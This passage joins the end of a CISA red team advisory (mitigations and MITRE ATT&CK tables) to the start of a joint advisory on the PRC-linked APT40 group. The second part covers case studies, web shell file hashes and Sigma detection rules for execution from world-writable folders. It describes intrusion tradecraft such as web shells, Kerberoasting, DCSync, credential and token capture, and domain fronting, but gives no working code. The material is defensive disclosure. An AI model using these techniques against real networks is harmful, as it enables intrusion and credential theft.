approved applications are permitted [CPG 2.Q]. Apply the principle of least privilege by granting users only the minimum level of access necessary to perform job functions. Insufficient tracking of software Conduct a comprehensive inventory of assets and establish a baseline for behavior [CPG 1.A]. Utilize a Software Asset Management (SAM) solution that offers comprehensive tracking, reporting, and compliance management capabilities. Deploy automated discovery and monitoring tools to continuously scan and identify new and existing software. CISA recommends organizations implement the recommendations in Table 2 to mitigate other identified issues that can be uncovered through traditional penetration tests or red team assessments. Table 2: Recommendations to Mitigate Identified Issues Issue Recommendation Accounts were overprivileged and the organization’s network contained unnecessary service accounts Apply the principle of least privilege when assigning permissions to user accounts. Audit existing group memberships, strip unnecessary privileges, and prune unnecessary nested groups/users. Monitor for account lockout, especially on administrative accounts, and switch to a manual account unlock policy. Increase monitoring for higher-risk accounts, such as service accounts, that are highly privileged and have a predictable pattern of behavior (e.g., scans that reliably run at a certain hour of the day). Privileged users should have dedicated role-based user accounts and associated jump hosts to log into critical resources. Insufficient EDR configuration Ensure all hosts have a form of EDR installed. Deploy an EDR capable of catching commonly known obfuscation or execution techniques. Insecure and insufficient credentials Ensure sensitive credentials and documents are not stored in an accessible place. Mandate strong and complex passwords [CPG 2.B]. For more information, see CISA’s Secure Our World: Require Strong Passwords. Note: The above mitigations apply to critical infrastructure organizations with on-premises or hybrid environments. CISA encourage all organizations to prioritize purchasing products from manufacturers who demonstrate secure by design principles, such as evidenced by follow-on publications from companies who have signed the Secure by Design Pledge. Software Manufacturers CISA recognizes that insecure software is the root cause of many flaws; the responsibility should not rest on the end user. CISA urges software manufacturers to implement the following: Eliminate default passwords and determine what password practices should be required (such as minimum password length and disallowing known breached passwords). Configure software to use more secure authentication schemes by default. Provide logging at no additional charge. Cloud services and on-premises products should commit to generating and storing security related logs at no additional cost. Work with security information and event management (SIEM) and security orchestration, automation, and response (SOAR) providers—in conjunction with customers—to understand how response teams use logs to investigate incidents. The goal is to develop logs that yield a comprehensive story of the event. Remove unnecessary software dependencies. Unnecessary software increases the attack surface available to adversaries and may introduce additional vulnerabilities. Mitigating these additional vulnerabilities requires significant investment, consuming resources like time, technical personnel, and adding to the level of security effort. These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.  For more information on secure by design, see CISA’s Secure by Design webpage. For more information on common misconfigurations and guidance on reducing their prevalence, see joint advisory NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. VALIDATE SECURITY CONTROLS In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Tables 3–11). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. RESOURCES Layering Network Security Through Segmentation Recommended Practice: Improving Industrial Control System Cybersecurity with Defense-in-Depth Strategies Phishing Guidance: Stopping the Attack Cycle at Phase One BOFs Detecting DCSync App Domain Hijacking Overview DISCLAIMER The information in this report is being provided “as is” for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA. VERSION HISTORY July 11, 2024: Initial version. APPENDIX: MITRE ATT&CK TACTICS AND TECHNIQUES See Tables 3–11 for all referenced threat actor tactics and techniques in this advisory. Table 3: Reconnaissance Technique Title ID Use Search Victim-Owned Websites T1594 CISA’s red team used open source tools and services to probe the organization’s internet-facing presence and gather information, including names, roles, and contact information. Gather Victim Network Information: DNS T1590.002 The red team gathered information about the organization’s DNS records, which revealed several details about the organization’s internal network. Gather Victim Identity Information: Employee Names T1589.003 CISA’s red team collected the assessed organizations’ employee names to use their email addresses for specific targeting based on roles and responsibilities. Gather Victim Org Information: Identity Roles T1591.004 CISA’s red team selected specific individuals from the assessed organization and targeted them with phishing payloads. Table 4: Command and Control Technique Title ID Use Application Layer Protocol: Web Protocols T1071.001 The red team exploited CVE-2022-21587 and ran a RAT that provided consistent C2 via open Transmission Control Protocol (TCP) ports. Non-Standard Port T1571 The red team used SSH over ports 80 and/or 443 when establishing outbound C2. Proxy: Domain Fronting T1090.004 CISA’s red team leveraged domain fronting to redirect and obfuscate their traffic. Table 5: Credential Access Technique Title ID Use Brute Force: Password Cracking T1110.002 The red team cracked an account’s password by using a common wordlist. OS Credential Dumping: DCSync T1003.006 CISA’s red team pulled credentials for the domain via DCSync to gain full access to the domain. Unsecured Credentials: Bash History T1552.003 The red team obtained a password by searching a user’s bash command history, which provided further unprivileged access throughout the network. Table 6: Discovery Technique Title ID Use Domain Trust Discovery T1482 CISA’s red team inspected the assessed organization’s domain trust relationships through LDAP and identified potential connections in external organizations to which to move laterally. File and Directory Discovery T1083 The red team data mined numerous internal servers and discovered one misconfigured share that contained plaintext usernames and passwords for several privileged service accounts. Table 7: Privilege Escalation Technique Title ID Use Hijack Execution Flow: Path Interception by PATH Environment Variable T1574.007 The red team hijacked the execution flow of a program that used a relative path instead of an absolute path, which enabled the capture of the account’s password. Access Token Manipulation: Token Impersonation/Theft T1134.001 CISA’s red team impersonated the tokens of current users to exploit valid sessions and bypass the organization’s IDM. Access Token Manipulation: Make and Impersonate Token T1134.003 CISA’s red team created new tokens and logon sessions for accounts not registered with the IDM to escalate privileges. Table 8: Lateral Movement Technique Title ID Use Remote Services: SSH T1021.004 CISA’s red team used SSH with a valid account to move through the enclave. Proxy T1090 The red team used a SOCKS proxy to avoid direct connections to their infrastructure and obscure the source of the malicious traffic. Use Alternate Authentication Material: Pass the Hash T1550.002 The red team’s operations were hindered by the organization’s IDM when it blocked the team’s attempts to bypass system access controls using different hash types for authentication. Use Alternate Authentication Material: Pass the Ticket T1550.003 CISA’s red team’s operations were hindered by the organization’s  IDM when it blocked the team’s attempts to bypass system access controls using Kerberos tickets for authentication. Table 9: Collection Technique Title ID Use Data from Local System T1005 CISA’s red team searched each host for files containing sensitive or interesting information such as password hashes, account information, network configurations, etc. Table 10: Persistence Technique Title ID Use Scheduled Task/Job: Cron T1053.003 The red team used the cron utility to perform task scheduling and execute malicious code within Unix systems at specified times. Scheduled Task/Job: At T1053.002 CISA’s red team used the at utility to perform task scheduling and execute malicious code within Unix systems at a specified time and date. Hijack Execution Flow: AppDomainManager T1574.014 The red team executed malicious payloads by hijacking how the .NETAppDomainManager loads assemblies. Valid Accounts: Domain Accounts T1078.002 CISA’s red team regularly used compromised valid domain accounts managed by Active Directory, giving access to resources of the domain. Table 11: Defensive Evasion Technique Title ID Use Masquerading: Masquerade Task or Service T1036.004 The red team enumerated local files and running processes to gather information for their payloads and persistence mechanisms to appear as legitimate activity. Obfuscated Files or Information T1027 CISA’s red team encrypted, encoded, and obfuscated their executables and C2 channels to evade defenses across the network. File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification T1222.002 The red team modified file permissions with touch and chmod/chown commands to obfuscate their activity and blend in with other files in the environment. Indicator Removal: Timestomp T1070.006 CISA’s red team modified file timestamps to hide their operational activity.

Overview Background This advisory, authored by the Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC), the United States Cybersecurity and Infrastructure Security Agency (CISA), the United States National Security Agency (NSA), the United States Federal Bureau of Investigation (FBI), the United Kingdom National Cyber Security Centre (NCSC-UK), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), the German Federal Intelligence Service (BND) and Federal Office for the Protection of the Constitution (BfV), the Republic of Korea’s National Intelligence Service (NIS) and NIS’ National Cyber Security Center, and Japan’s National Center of Incident Readiness and Strategy for Cybersecurity (NISC) and National Police Agency (NPA)—hereafter referred to as the “authoring agencies”—outlines a People’s Republic of China (PRC) state-sponsored cyber group and their current threat to Australian networks. The advisory draws on the authoring agencies’ shared understanding of the threat as well as ASD’s ACSC incident response investigations. The PRC state-sponsored cyber group has previously targeted organizations in various countries, including Australia and the United States, and the techniques highlighted below are regularly used by other PRC state-sponsored actors globally. Therefore, the authoring agencies believe the group, and similar techniques remain a threat to their countries’ networks as well. The authoring agencies assess that this group conduct malicious cyber operations for the PRC Ministry of State Security (MSS). The activity and techniques overlap with the groups tracked as Advanced Persistent Threat (APT) 40 (also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan and Bronze Mohawk in industry reporting). This group has previously been reported as being based in Haikou, Hainan Province, PRC and receiving tasking from the PRC MSS, Hainan State Security Department.[1] The following Advisory provides a sample of significant case studies of this adversary’s techniques in action against two victim networks. The case studies are consequential for cybersecurity practitioners to identify, prevent and remediate APT40 intrusions against their own networks. The selected case studies are those where appropriate remediation has been undertaken reducing the risk of re-exploitation by this threat actor, or others. As such, the case studies are naturally older in nature, to ensure organizations were given the necessary time to remediate. To download the PDF version of this report, visit the following link, APT40 Advisory. Activity Summary APT40 has repeatedly targeted Australian networks as well as government and private sector networks in the region, and the threat they pose to our networks is ongoing. The tradecraft described in this advisory is regularly observed against Australian networks. Notably, APT40 possesses the capability to rapidly transform and adapt exploit proof-of-concept(s) (POCs) of new vulnerabilities and immediately utilize them against target networks possessing the infrastructure of the associated vulnerability. APT40 regularly conducts reconnaissance against networks of interest, including networks in the authoring agencies’ countries, looking for opportunities to compromise its targets. This regular reconnaissance postures the group to identify vulnerable, end-of-life or no longer maintained devices on networks of interest, and to rapidly deploy exploits. APT40 continues to find success exploiting vulnerabilities from as early as 2017. APT40 rapidly exploits newly public vulnerabilities in widely used software such as Log4J (CVE-2021-44228), Atlassian Confluence (CVE-2021-31207, CVE-2021-26084) and Microsoft Exchange (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473). ASD’s ACSC and the authoring agencies expect the group to continue using POCs for new high-profile vulnerabilities within hours or days of public release. Figure 1: TTP Flowchart for APT40 activity This group appears to prefer exploiting vulnerable, public-facing infrastructure over techniques that require user interaction, such as phishing campaigns, and places a high priority on obtaining valid credentials to enable a range of follow-on activities. APT40 regularly uses web shells [T1505.003] for persistence, particularly early in the life cycle of an intrusion. Typically, after successful initial access APT40 focuses on establishing persistence to maintain access on the victim’s environment. However, as persistence occurs early in an intrusion, it is more likely to be observed in all intrusions—regardless of the extent of compromise or further actions taken. Notable Tradecraft Although APT40 has previously used compromised Australian websites as command and control (C2) hosts for its operations, the group have evolved this technique [T1594]. APT40 has embraced the global trend of using compromised devices, including small-office/home-office (SOHO) devices, as operational infrastructure and last-hop redirectors [T1584.008] for its operations in Australia. This has enabled the authoring agencies to better characterize and track this group’s movements. Many of these SOHO devices are end-of-life or unpatched and offer a soft target for N-day exploitation. Once compromised, SOHO devices offer a launching point for attacks that is designed to blend in with legitimate traffic and challenge network defenders [T1001.003]. This technique is also regularly used by other PRC state-sponsored actors worldwide, and the authoring agencies consider this to be a shared threat. For additional information, see joint advisories People’s Republic of China State-Sponsored Cyber Actors Exploit Network Providers and Devices and PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure. APT40 does occasionally use procured or leased infrastructure as victim-facing C2 infrastructure in its operations; however, this tradecraft appears to be in relative decline. Tooling ASD’s ACSC are sharing some of the malicious files identified during the investigations outlined below. These files have been uploaded to VirusTotal to enable the wider network defense and cyber security communities to better understand the threats they need to defend against. MD5 Filename Additional information 26a5a7e71a601be991073c78d513dee3 horizon.jsp 1 kB | Java Source 87c88f06a7464db2534bc78ec2b915de Index_jsp$ProxyEndpoint$Attach.class 597 B | Java Bytecode 6a9bc68c9bc5cefaf1880ae6ffb1d0ca Index_jsp.class 5 kB | Java Bytecode 64454645a9a21510226ab29e01e76d39 Index_jsp.java 5 kB | Java Source e2175f91ce3da2e8d46b0639e941e13f Index_jsp$ProxyEndpoint.class 4 kB | Java Bytecode 9f89f069466b8b5c9bf25c9374a4daf8 Index_jsp$ProxyEndpoint$1.class 3 kB | Java Bytecode 187d6f2ed2c80f805461d9119a5878ac Index_jsp$ProxyEndpoint$2.class 1 kB | Java Bytecode ed7178cec90ed21644e669378b3a97ec Nova_jsp.class 7 kB | Java Bytecode 5bf7560d0a638e34035f85cd3788e258 Nova_jsp$TomcatListenerMemShellFromThread.class 8 kB | Java Bytecode e02be0dc614523ddd7a28c9e9d500cff Nova_jsp.java 15 kB | Java Source Case Studies ASD’s ACSC are sharing two anonymized investigative reports to provide awareness of how the actors employ their tools and tradecraft. Case Study 1 This report has been anonymized to enable wider dissemination. The impacted organization is hereafter referred to as “the organization.” Some specific details have been removed to protect the identity of the victim and incident response methods of ASD’s ACSC. Executive Summary This report details the findings of the ASD’s ACSC investigation into the successful compromise of the organization’s network between July and September 2022. This investigative report was provided to the organization to summarize observed malicious activity and frame remediation recommendations. The findings indicate the compromise was undertaken by APT40. In mid-August, the ASD’s ACSC notified the organization of malicious interactions with their network from a likely compromised device being used by the group in late August and, with the organization’s consent, the ASD’s ACSC deployed host-based sensors to likely affected hosts on the organization’s network. These sensors allowed ASD’s ACSC incident response analysts to undertake a thorough digital forensics investigation. Using available sensor data, the ASD’s ACSC analysts successfully mapped the group’s activity and created a detailed timeline of observed events. From July to August, key actor activity observed by the ASD’s ACSC included: Host enumeration, which enables an actor to build their own map of the network; Web shell use, giving the actor an initial foothold on the network and a capability to execute commands; and Deployment of other tooling leveraged by the actor for malicious purposes. The investigation uncovered evidence of large amounts of sensitive data being accessed and evidence that the actors moved laterally through the network [T1021.002]. Much of the compromise was facilitated by the group’s establishment of multiple access vectors into the network, the network having a flat structure, and the use of insecure internally developed software that could be used to arbitrarily upload files. Exfiltrated data included privileged authentication credentials that enabled the group to log in, as well as network information that would allow the actors to regain unauthorized access if the original access vector was blocked. No additional malicious tooling was discovered beyond those on the initially exploited machine; however, a group’s access to legitimate and privileged credentials would negate the need for additional tooling. Findings from the investigation indicate the organization was likely deliberately targeted by APT40, as opposed to falling victim opportunistically to a publicly known vulnerability. Investigation Findings In mid-August 2022, the ASD’s ACSC notified the organization that a confirmed malicious IP believed to be affiliated with a state-sponsored cyber group had interacted with the organization’s computer networks between at least July and August. The compromised device probably belonged to a small business or home user. In late August, the ASD’s ACSC deployed a host-based agent to hosts on the organization’s network which showed evidence of having been impacted by the compromise. Some artefacts which could have supported investigation efforts were not available due to the configuration of logging or network design. Despite this, the organization’s readiness to provide all available data enabled ASD’s ACSC incident responders to conduct comprehensive analysis and to form an understanding of likely APT40 activity on the network. In September, after consultation with the ASD’s ACSC, the organization decided to denylist the IP identified in the initial notification. In October, the organization commenced remediation. Details Beginning in July, actors were able to test and exploit a custom web application [T1190] running on <webapp>2-ext, which enables the group to establish a foothold in the network demilitarized zone (DMZ). This was leveraged to enumerate both the network as well as all visible domains. Compromised credentials [T1078.002] were used to query the Active Directory [T1018] and exfiltrate data by mounting file shares [T1039] from multiple machines within the DMZ. The actor carried out a Kerberoasting attack in order to obtain valid network credentials from a server [T1558.003]. The group were not observed gaining any additional points of presence in either the DMZ or the internal network. Visual Timeline The below timeline provides a broad overview of the key phases of malicious actor activity observed on the organization’s network. Detailed Timeline July: The actors established an initial connection to the front page of a custom web application [T1190] built for the organization (hereafter referred to as the “web application” or “webapp”) via a transport layer security (TLS) connection [T1102]. No other noteworthy activity was observed. July: The actors begin enumerating the web application’s website looking for endpoints[2] to further investigate. July: The actors concentrate on attempts to exploit a specific endpoint. July: The actors are able to successfully POST to the web server, probably via a web shell placed on another page. A second IP, likely employed by the same actors, also begins posting to the same URL. The actors created and tested a number of likely web shells.  The exact method of exploitation is unknown, but it is clear that the specific endpoint was targeted to create files on <webapp>2-ext. ASD’s ACSC believes that the two IP address connections were part of the same intrusion due to their shared interest and initial connections occurring minutes apart. July: The group continue to conduct host enumeration, looking for privilege escalation opportunities, and deploying a different web shell. The actors log into the web application using compromised credentials for <firstname.surname>@<organisation domain>. The actors’ activity does not appear to have successfully achieved privilege escalation on <webapp>2-ext. Instead, the actors pivoted to network-based activity. July: The actor tests the compromised credentials for a service account[3] which it likely found hardcoded in internally accessible binaries. July: The actors deploy the open-source tool Secure Socket Funnelling, which was used to connect out to the malicious infrastructure. This connection is employed to tunnel traffic from the actor’s attack machines into the organization’s internal networks, whose machine names are exposed in event logs as they attempt to use the credentials for the service account. August: The actors are seen conducting a limited amount of activity, including failing to establish connections involving the service account. August: The actors perform significant network and Active Directory enumeration. A different compromised account is subsequently employed to mount shares[4] on Windows machines within the DMZ, enabling successful data exfiltration. This seems to be opportunistic usage of a stolen credential on mountable machines in the DMZ. Firewalls blocked the actor from targeting the internal network with similar activity. August – September: The SSF tool re-established a connection to a malicious IP. The group are not observed performing any additional activities until their access is blocked. September: The organization blocks the malicious IP by denylisting it on their firewalls. Actor Tactics and Techniques The MITRE ATT&CK framework is a documented collection of tactics and techniques employed by threat actors in cyberspace. The framework was created by U.S. not-for-profit The MITRE Corporation and functions as a common global language around threat actor behavior. The ASD’s ACSC assesses the following techniques and tactics to be relevant to the actor’s malicious activity: Reconnaissance T1594 – Search Victim-Owned Websites The actor enumerated the custom web application’s website to identify opportunities for accessing the network. Initial Access T1190 – Exploit Public-Facing Application (regarding exploiting the custom web application) T1078.002 – Valid Accounts: Domain Accounts (regarding logging on with comprised credentials) Exploiting internet-exposed custom web applications provided an initial point of access for the actor. The actor was later able to use credentials they had compromised to further their access to the network. Execution T1059 – Command and Scripting Interpreter (regarding command execution through the web shell) T1072 – Software Deployment Tools (regarding the actor using open-source tool Secure Socket Funnelling (SSF) to connect to an IP) Persistence T1505.003 – Server Software Component: Web Shell (regarding use of a web shell and SSF to establish access) Credential Access T1552.001 – Credentials from Password Stores (regarding password files relating to building management system [BMS]) T1558.003 – Steal or Forge Kerberos Tickets: Kerberoasting (regarding attack to gain network credentials) Lateral movement T1021.002 – Remote Services: SMB Shares (regarding the actor mounting SMB shares from multiple devices) Collection T1213 – Data from Information Repositories (regarding manuals/documentation found on the BMS server) Exfiltration T1041 – Exfiltration Over C2 Channel (regarding the actor’s data exfiltration from Active Directory and mounting shares) Case Study 2 This report has been anonymized to enable wider dissemination. The impacted organization is hereafter referred to as “the organization.” Some specific details have been removed to protect the identity of the victim and incident response methods of ASD’s ACSC. Executive Summary This report details the findings of ASD’s ACSC investigation into the successful compromise of the organization’s network in April 2022. This investigation report was provided to the organization to summarize observed malicious activity and frame remediation recommendations. The findings indicate the compromise was undertaken by APT40. In May 2022, ASD’s ACSC notified an organization of suspected malicious activity impacting the organization’s network since April 2022. Subsequently, the organization informed ASD’s ACSC that they had discovered malicious software on an internet‑facing server which provided the login portal for the organization’s corporate remote access solution. This server used a remote access login and identity management product and will be referred to in this report as ‘the compromised appliance’. This report details the investigation findings and remediation advice developed for the organization in response to the investigation conducted by the ASD’s ACSC. Evidence indicated that part of the organization’s network had been compromised by malicious cyber actor(s) via the organization’s remote access login portal since at least April 2022. This server may have been compromised by multiple actors, and was likely affected by a remote code execution (RCE) vulnerability that was widely publicized around the time of the compromise. Key actor activity observed by the ASD’s ACSC included: Host enumeration, which enables an actor to build their own map of the network; Exploitation of internet-facing applications and web shell use, giving the actor an initial foothold on the network and a capability to execute commands; Exploitation of software vulnerabilities to escalate privileges; and Credential collection to enable lateral movement. The ASD’s ACSC discovered that a malicious actor had exfiltrated several hundred unique username and password pairs on the compromised appliance in April 2022, as well as a number of multi-factor authentication codes and technical artefacts related to remote access sessions. Upon a review by the organization, the passwords were found to be legitimate. The ASD’s ACSC assesses that the actor may have collected these technical artefacts to hijack or create a remote login session as a legitimate user, and access the organization’s internal corporate network using a legitimate user account. Investigation Summary The ASD’s ACSC determined that the actor compromised appliance(s) which provide remote login sessions for organization staff and used this compromise to attempt to conduct further activity. These appliances consist of three load-balanced hosts where the earliest evidence of compromise was detected. The organization shut down two of the three load-balanced hosts shortly after the initial compromise. As a result, all subsequent activity occurred on a single host. The other servers associated with the compromised appliance were also load-balanced in a similar manner. For legibility, all compromised appliances are referred to in most of this report as a “single appliance.” The actor is believed to have used publicly known vulnerabilities to deploy web shells to the compromised appliance from April 2022 onwards. Threat actors from the group are assessed to have attained escalated privileges on the appliance. The ASD’s ACSC could not determine the full extent of the activity due to lack of logging availability. However, evidence on the device indicates that an actor achieved the following: The collection of several hundred genuine username and password pairs; and The collection of technical artefacts which may have allowed a malicious actor to access a virtual desktop infrastructure (VDI) session as a legitimate user. The ASD’s ACSC assesses that the actor would have sought to further the compromise of the organisation network. The artefacts exfiltrated by the actor may have allowed them to hijack or initiate virtual desktop sessions as a legitimate user, possibly as a user of their choice, including administrators. The actor may have used this access vector to further compromise organization services to achieve persistence and other goals. Other organization appliances within the hosting provider managed environment did not show evidence of compromise. Access The host with the compromised appliance provided authentication via Active Directory and a webserver, for users connecting to VDI sessions [T1021.001]. Location Compromised appliance hostnames (load-balanced) Datacentre 1 HOST1, HOST2, HOST3 The appliance infrastructure also included access gateway hosts that provide a tunnel to the VDI for the user, once they possess an authentication token generated and downloaded from the appliance. There was no evidence of compromise of any of these hosts. However, the access gateway hosts logs showed evidence of significant interactions with known malicious IP addresses. It is likely that this reflected activity that occurred on this host, or network connections with threat actor infrastructure that reached this host. The nature of this activity could not be determined using available evidence but indicates that the group sought to move laterally in the organization’s network [TA0008]. Internal Hosts The ASD’s ACSC investigated limited data from the internal organization’s network segment. Attempted or successful malicious activity known to have impacted the internal organization’s network segment includes actor access to VDI-related artefacts, the scraping of an internal SQL server [T1505.001], and unexplained traffic observed going from known malicious IP addresses through the access gateway appliances [TA0011]. Using their access to the compromised appliance, the group collected genuine usernames, passwords [T1003], and MFA token values [T1111]. The group also collected JSON Web Tokens (JWTs) [T1528], which is an authentication artefact used to create virtual desktop login sessions. The actor may have been able to use these to create or hijack virtual desktop sessions [T1563.002] and access the internal organization network segment as a legitimate user [T1078]. The actor also used access to the compromised appliance to scrape an SQL server [T1505.001], which resided in the organization’s internal network. It is likely that the actor had access to this data. Evidence available from the access gateway appliance revealed that network traffic occurred through or to this device from known malicious IP addresses. As described above, this may indicate that malicious cyber actors impacted or utilized this device, potentially to pivot into the internal network. Investigation Timeline The below list provides a timeline of key activities discovered during the investigation. Time Event April 2022 Known malicious IP addresses interact with access gateway host HOST7. The nature of the interactions could not be determined. April 2022 All hosts, HOST1, HOST2 and HOST3, were compromised by a malicious actor or actors, and web shells were placed on the hosts. A log file was created or modified on HOST2. This file contains credential material likely captured by a malicious actor. The /etc/security/opasswd and /etc/shadow files were modified on HOST1 and HOST3, indicating that passwords were changed. Evidence available on HOST1 suggests that the password for user ‘sshuser’ was changed. April 2022 HOST2 was shut down by the organization. Additional web shells (T1505.003) were created on HOST1 and HOST3. HOST1experienced SSH brute force attempts from HOST3. A log file was modified (T1070) on HOST3. This file contains credential material (T1078) likely captured by a malicious actor. JWTs were captured (T1528) and output to a file on HOST3. HOST3 was shut down by the organization. All activity after this time occurs on HOST1. April 2022 Additional web shells were created on HOST1 (T1505.003). JWTs were captured and output to a file on HOST1. April 2022 Additional web shells are created on HOST1 (T1505.003), and a known malicious IP address interacts with the host (TA0011). A known malicious IP address interacts with access gateway host HOST7. May 2022 A known malicious IP address interacted with access gateway host HOST7 (TA0011). An authentication event for a user is linked to a known malicious IP address in logs on HOST1. An additional web shell is created on this host (T1505.003). May 2022 A script on HOST1 was modified by an actor (T1543). This script contains functionality which would have scraped data from an internal SQL server. May 2022 An additional log file on HOST1 was last modified (T1070). This file contains username and password pairs for the organization network, which are believed to be legitimate (T1078). May 2022 An additional log file was last modified (T1070). This file contains JWTs collected from HOST1. May 2022 Additional web shells were created on HOST1 (T1505.003). On this date, the organization reported the discovery of a web shell with creation date in April 2022 to ASD’s ACSC May 2022 A number of scripts were created on HOST1, including one named Log4jHotPatch.jar. May 2022 The iptables-save command was used to add two open ports to the access gateway host. The ports were 9998 and 9999 (T1572). Actor Tactics and Techniques Highlighted below are several tactics and techniques identified during the investigation. Initial access T1190 Exploit public facing application The group likely exploited RCE, privilege escalation, and authentication bypass vulnerabilities in the remote access login and identity management product to gain initial access to the network. This initial access method is considered the most likely due to the following: The server was vulnerable to these CVEs at the time; Attempts to exploit these vulnerabilities from known actor infrastructure; and The first known internal malicious activity occurred shortly after attempted exploitation attempts were made. Execution T1059.004 Command and Scripting Interpreter: Unix Shell The group successfully exploited the above vulnerabilities may have been able to run commands in a Unix shell available on the affected appliance. Complete details of the commands run by actors cannot be provided as they were not logged by the appliance. Persistence T1505.003 Server Software Component: Web Shell Actors deployed several web shells on the affected appliance. It is possible that multiple distinct actors deployed web shells, but that only a smaller number of actors conducted activity using these web shells. Web shells would have allowed for arbitrary command execution by the actor on the compromised appliances. Privilege escalation T1068 Exploitation for Privilege Escalation Available evidence does not describe the level of privilege attained by actors. However, using web shells, the actors would have achieved a level of privilege comparable to that of the web server on the compromised appliance. Vulnerabilities believed to have been present on the compromised appliance would have allowed the actors to attain root privileges. Credential access T1056.003 Input Capture: Web Portal Capture Evidence on the compromised appliance showed that the actor had captured several hundred username-password pairs, in clear text, which are believed to be legitimate. It is likely that these were captured using some modification to the genuine authentication process which output the credentials to a file. T1111 Multi-Factor Authentication Interception The actor also captured the value of MFA tokens corresponding to legitimate logins. These were likely captured by modifying the genuine authentication process to output these values to a file. There is no evidence of compromise of the “secret server’ which stores the unique values that provide for the security of MFA tokens. T1040 Network Sniffing The actor is believed to have captured JWTs by capturing HTTP traffic on the compromised appliance. There is evidence that the utility tcpdump was executed on the compromised appliance, which may have been how the actor captured these JWTs. T1539 Steal Web Session Cookie As described above, the actor captured JWTs, which are analogous to web session cookies. These could have been reused by the actor to establish further access. Discovery T1046 Network Service Discovery There is evidence that network scanning utility nmap was executed on the compromised appliance to scan other appliances in the same network segment. This was likely used by the actor to discover other reachable network services which might present opportunities for lateral movement. Collection Available evidence does not reveal how actors collected data or exactly what was collected from the compromised appliance or from other systems. However, it is likely that actors had access to all files on the compromised appliance, including the captured credentials [T1003], MFA token values [T1111], and JWTs described above. Command and Control T1071.001 Application Layer Protocol: Web Protocols Actors used web shells for command and control. Web shell commands would have been passed over HTTPS using the existing web server on the appliance [T1572]. T1001.003 Data Obfuscation: Protocol Impersonation Actors used compromised devices as a launching point for attacks that are designed to blend in with legitimate traffic. Detection and mitigation recommendations The ASD’s ACSC strongly recommends implementing the ASD Essential Eight Controls and associated Strategies to Mitigate Cyber Security Incidents. Below are recommendations for network security actions that should be taken to detect and prevent intrusions by APT40, followed by specific mitigations for four key TTPs summarized in Table 1. Detection Some of the files identified above were dropped in locations such as C:\Users\Public\* and C:\Windows\ Temp\*. These locations can be convenient spots for writing data as they are usually world writable, that is, all user accounts registered in Windows have access to these directories and their subdirectories. Often, any user can subsequently access these files, allowing opportunities for lateral movement, defense evasion, low-privilege execution and staging for exfiltration. The following Sigma rules look for execution from suspicious locations as an indicator of anomalous activity. In all instances, subsequent investigation is required to confirm malicious activity and attribution. Title: World Writable Execution – Temp ID: d2fa2d71-fbd0-4778-9449-e13ca7d7505c Description: Detect process execution from C:\ Windows\Temp. Background: This rule looks specifically for execution out of C:\ Windows\Temp\*. Temp is more broadly used by benign applications and thus a lower confidence malicious indicator than execution out of other world writable subdirectories in C:\Windows. Removing applications executed by the SYSTEM or NETWORK SERVICE users substantially reduces the quantity of benign activity selected by this rule. This means that the rule may miss malicious executions at a higher privilege level but it is recommended to use other rules to determine if a user is attempting to elevate privileges to SYSTEM. Investigation: Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file. Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious. If necessary attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate. References: Process Execution from an Unusual Directory Author: ASD’s ACSC Date: 2024/06/19 Status: experimental Tags: tlp.green classification.au.official attack.execution Log Source: category: process_creationproduct: windows Detection: temp:Image|startswith: ‘C:\\Windows\\Temp\\’ common_temp_path:Image|re|ignorecase: ‘C:\\Windows\\Temp\\\{[a-fA-F0-9]{8}-([a-fA-F0-9]{4}-){3}[a-fA-F0-9]{12}\}\\’ system_user:User: ‘SYSTEM’ ‘NETWORK SERVICE’ dismhost: Image|endswith: ‘dismhost.exe’  known_parent: ParentImage|endswith: ‘\\esif_uf.exe’  ‘\\vmtoolsd.exe’  ‘\\cwainstaller.exe’ ‘\\trolleyexpress.exe’ condition: temp and not (common_temp_path or system_user or dismhost or known_parent) False positives: Allowlist auditing applications have been observed running executables from Temp. Temp will legitimately contain an array of setup applications and launchers, so it will be worth considering how prevalent this behavior is on a monitored network (and whether or not it can be allowlisted) before deploying this rule. Level: low Title: World Writable Execution – Non-Temp System Subdirectory ID: 5b187157-e892-4fc9-84fc-aa48aff9f997 Description: Detect process execution from a world writable location in a subdirectory of the Windows OS install location. Background: This rule looks specifically for execution out of world writable directories within C:\ and particularly C:\Windows\*, with the exception of C:\Windows\Temp (which is more broadly used by benign applications and thus a lower confidence malicious indicator). AppData folders are excluded if a file is run as SYSTEM – this is a benign way in which many temporary application files are executed. After completing an initial network baseline and identifying known benign executions from these locations, this rule should rarely fire. Investigation: Examine information directly associated with this file execution, such as the user context, execution integrity level, immediate follow-on activity and images loaded by the file. Investigate contextual process, network, file and other supporting data on the host to help make an assessment as to whether the activity is malicious. If necessary attempt to collect a copy of the file for reverse engineering to determine whether it is legitimate. References: mattifestation / WorldWritableDirs.txtProcess Execution from an Unusual Directory Author: ASD’s ACSC Date: 